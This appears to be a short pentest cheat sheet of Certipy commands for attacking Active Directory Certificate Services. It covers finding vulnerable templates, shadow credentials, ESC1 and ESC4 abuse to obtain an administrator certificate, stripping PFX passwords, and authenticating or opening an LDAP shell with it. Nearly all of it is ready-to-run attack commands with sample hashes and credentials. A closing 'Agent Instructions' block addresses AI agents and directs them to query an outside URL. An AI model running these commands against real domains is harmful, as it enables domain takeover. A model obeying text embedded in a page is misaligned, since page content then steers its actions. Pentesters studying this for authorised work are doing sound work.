# certipy

#### Find Vulnerable Template

* Find vulnerable template

```bash
certipy find -u 'user' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51  
certipy find -u 'billy@foobar.com' -p <password> -dc-ip <DC_IP> -vulnerable -enabled
certipy find -u 'user@domain.local' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51   

```

#### Shadow Credential

* Get Shadow credentials

```bash
certipy-ad shadow auto -u 'user@domain.local' -p "WqSZAF6CysDQbGb3" -account 'user_2' -dc-ip '10.10.11.51' 
```

#### ESC1

* Exploit `ESC1`

```bash
certipy-ad req -u user -target domain.local -upn administrator@domain.local -ca sequel-DC01-CA -template template_name -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51
```

```bash
certipy-ad req -u user -target domain.local -web -port 80 -subject 'DIstinguishedName' -sid 'SID -debug' -ca sequel-DC01-CA -template template_name -target-ip <ip_ca>

```

#### ESC4

* Exploit `ESC4`

```bash
certipy template -username user@domain.local  -hashes 3b181b914e7a9d5508ea1e20bc2b7fce  -template templateName  -save-old 
```

```bash
certipy template -username user@domain.local  -p -dc-ip ip_dc -template templateName  -save-old  -configuration configuration.json

```

#### Using PFXS withou password

* Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.

```bash
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
```

#### Auth using pfx

```bash
certipy auth -pfx administrator.pfx -domain domain.local

```

```bash
certipy auth -pfx administrator.pfx -domain domain.local --ldap-shell
```

#### Bloodhound

```bash
certipy find -u '[email protected]' -p 'Password123!' -dc-ip 10.129.205.199 -bloodhound
```

### Risorse

* <https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate>
* <https://github.com/ly4k/Certipy/blob/main/README.md>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.dado1513.dev/tools/certipy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.